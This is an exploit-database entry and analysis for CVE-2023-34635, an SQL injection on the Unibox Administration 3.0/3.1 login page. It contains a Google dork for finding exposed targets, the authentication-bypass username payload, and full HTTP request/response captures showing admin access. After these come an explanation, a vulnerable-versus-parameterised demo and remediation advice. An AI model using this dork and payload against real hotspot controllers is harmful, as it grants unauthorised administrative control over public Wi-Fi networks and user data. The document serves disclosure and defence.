Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

Exploit Author: Ansh Jain
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-20
# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author  Contact : arkinux01@gmail.com
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link: https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

The login page of Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to
SQL injection, which gives an attacker unauthorised administrator access. The
username field is neither validated nor sanitised: whatever is typed into it is
passed straight through the backend into the SQL query that checks the login.

## How to Reproduce
Step 1 : Visit the login page and check that the version banner shows 3.0 or
3.1.
Step 2 : Enter the payload 'or 1=1 limit 1-- - (the leading single quote is part
of the payload) in the username field and type any random password.
Step 3 : Fill in the captcha and hit login. You are now logged in as an
administrator and can view any user's data, modify data, revoke access, etc.


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private


<!DOCTYPE html>
<html lang="en">
html content
</html>


Wifi Soft Unibox Administration 3.0 & 3.1: A Critical SQL Injection Vulnerability Exposed

Security researchers have uncovered a severe vulnerability in the Wifi Soft Unibox Administration 3.0 and 3.1 web interface, which allows attackers to gain unauthorized administrative access through a simple SQL injection exploit. Identified as CVE-2023-34635, this flaw highlights the dangers of inadequate input validation in enterprise-grade network management software.

Understanding the Vulnerability

The core issue lies in the login page's handling of user input. Specifically, the username field is not properly sanitized before being sent to the backend database. This omission creates a direct path for malicious payloads to manipulate SQL queries, bypassing authentication entirely.

Attackers exploit this by injecting a crafted payload into the username field, turning the authentication check into an always-true condition. The payload 'or 1=1 limit 1-- - works because it:

  • Closes the string literal around the username with a single quote (')
  • Adds a condition that is always true (or 1=1), so every row in the table matches
  • Uses limit 1 so the query returns exactly one row (the first in the table), which keeps code that expects a single user record working
  • Ends with -- - so the rest of the statement, including the AND password = '...' check, is treated as a comment (MySQL only treats -- as a comment when whitespace follows it, hence the trailing " -")

The query therefore returns the first row of the users table regardless of the credentials entered. In the published proof of concept that row was an administrator account, which is why the resulting session lands on the admin dashboard.

Exploitation in Practice

Consider the following HTTP POST request to the login endpoint:

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

Explanation: This request sends the malicious payload in the username parameter. The password value is irrelevant because the comment removes the password check from the query. The captcha is still enforced, so the attacker has to solve it (manually, in the PoC) within the same PHPSESSID session; it does nothing to stop the injection itself, which lives in the username field. The action=Login parameter triggers the authentication code path.

On success the server answers with a 302 to ./dashboard/dashboard (the Login Response above) and the session carries administrator privileges. The advisory demonstrates viewing and modifying user data and revoking access; the administrator role of a hotspot controller generally extends to:

  • User account data
  • Access control settings
  • Session management
  • Configuration changes
  • Remote device management

Impact and Risks

The implications of this vulnerability are profound:

| Risk category        | Description |
|----------------------|-------------|
| Privilege escalation | Attackers gain full administrative privileges without valid credentials. |
| Data exposure        | Complete access to user records, including passwords if they are stored in plaintext or weakly hashed. |
| Denial of service    | A malicious administrator can lock out legitimate users or corrupt the configuration. |
| Network compromise   | Admin access allows hotspot policies to be changed, enabling unauthorised access or traffic redirection. |

Given that Unibox is used in public Wi-Fi networks (e.g., cafes, airports, hotels), this vulnerability could lead to widespread exploitation, potentially enabling attackers to:

  • Monitor user activity
  • Redirect traffic to phishing sites
  • Inject malicious scripts into sessions
  • Disable security features

Technical Analysis: Why This Happens

At the root, the vulnerability stems from how the login query is built:

  • Direct query construction: the application splices raw user input into the SQL text instead of binding it as a parameter.
  • Missing input handling: the single quote in the username is neither escaped nor rejected, so it closes the string literal and the rest of the input (or 1=1, limit 1, the -- - comment) is parsed as SQL.
  • Classic authentication query: the statement likely resembles SELECT * FROM users WHERE username = 'input' AND password = 'input' (an assumption; the Unibox source is not public), and a query of that shape is trivially manipulated once the quote is in play.

Database APIs such as PHP's PDO or Python's SQLAlchemy support parameterised queries (prepared statements), which send user data to the database separately from the statement text. They do not enforce it: code that concatenates strings and hands them to $pdo->query() is just as vulnerable. Not using bound parameters in Unibox Administration 3.0/3.1 is the critical oversight.
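The payload walkthrough above and the assumed query shape in this section, demonstrated end to end as an added example (constructed code, not Unibox source): a concatenated login query against an in-memory SQLite table, the same query with bound parameters, and the advisory's payload run through both. The table layout, the two rows and the function names are assumptions made for the demonstration; SQLite stands in for whatever database Unibox uses, and the payload behaves the same way there because both treat '' as an empty string literal and -- as a line comment.

```python
"""Vulnerable versus parameterised login query (added example, not Unibox code).
The users table, its rows and the function names are constructed for the demo."""
import sqlite3

PAYLOAD = "'or 1=1 limit 1-- -"  # the advisory's username payload


def make_db():
    """In-memory users table with constructed rows. The admin row comes
    first, which is what makes 'limit 1' hand back an administrator."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!", "administrator"), ("guest", "guest", "user")],
    )
    return db


def render_vulnerable_sql(username, password):
    """The concatenated statement the article assumes, returned as text so the
    effect of the payload on the query can be inspected."""
    return ("SELECT username, role FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def vulnerable_login(db, username, password):
    """String concatenation: the quote in the input closes the literal,
    'or 1=1' makes the WHERE clause true for every row, 'limit 1' picks the
    first row, and '-- -' comments out the password check entirely."""
    return db.execute(render_vulnerable_sql(username, password)).fetchone()


def safe_login(db, username, password):
    """Bound parameters: the whole payload is compared as a username value and
    matches nothing. (Real code stores a password hash, not the password; the
    plaintext column here only keeps the injection comparison simple.)"""
    return db.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(render_vulnerable_sql(PAYLOAD, "randompassword"))
    print("concatenated :", vulnerable_login(db, PAYLOAD, "randompassword"))
    print("parameterised:", safe_login(db, PAYLOAD, "randompassword"))
```

The rendered statement reads `... WHERE username = ''or 1=1 limit 1-- -' AND password = 'randompassword'`: everything after `-- ` is a comment, so the password never takes part in the comparison. With bound parameters the database receives the statement text once and the payload as a plain string value, and there is no position in which a quote can change the query structure.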

Remediation and Best Practices

Organizations using Unibox must take immediate action:

  • Upgrade: obtain the vendor's fixed release for CVE-2023-34635; until it is installed, restrict network access to the administration interface.
  • Use parameterized queries: replace string concatenation with prepared statements; this is the actual fix.
  • Validate input: allowlist the characters a username may contain as defence in depth; do not rely on blacklisting SQL characters with regular expressions, which is bypassable.
  • Store password hashes: compare with password_verify() rather than placing the submitted password in the query.
  • Enable logging and monitoring: log failed and successful logins with the submitted username, so a payload such as 'or 1=1 is visible in the record and can be alerted on.
  • Enforce multi-factor authentication: a login obtained through the database alone should not be enough on its own.

Example of a secure login check in PHP using PDO (the column name password_hash is assumed):


$stmt = $pdo->prepare("SELECT id, password_hash FROM users WHERE username = ? LIMIT 1");
$stmt->execute([$username]);           // $username is bound as data, never parsed as SQL
$user = $stmt->fetch(PDO::FETCH_ASSOC);
if ($user === false || !password_verify($password, $user['password_hash'])) {
    exit('Invalid credentials');       // same generic message for both failure cases
}

Explanation: The ? placeholder is a bound parameter: the username travels to the database as a value, separately from the statement text, so a quote inside it cannot close the string literal or append or 1=1. The password no longer appears in the query at all; it is checked with password_verify() against a stored hash, which also removes the plaintext-password risk noted under Data exposure above.

Conclusion

The CVE-2023-34635 vulnerability in Wifi Soft Unibox Administration 3.0 & 3.1 is a stark reminder that even seemingly benign web interfaces can pose significant security risks. It underscores the importance of:

  • Secure coding standards
  • Regular security audits
  • Continuous patching and updates

For administrators, this exploit should serve as a wake-up call: never assume a login form is secure. Always validate inputs, use modern security practices, and treat every user input as potentially malicious.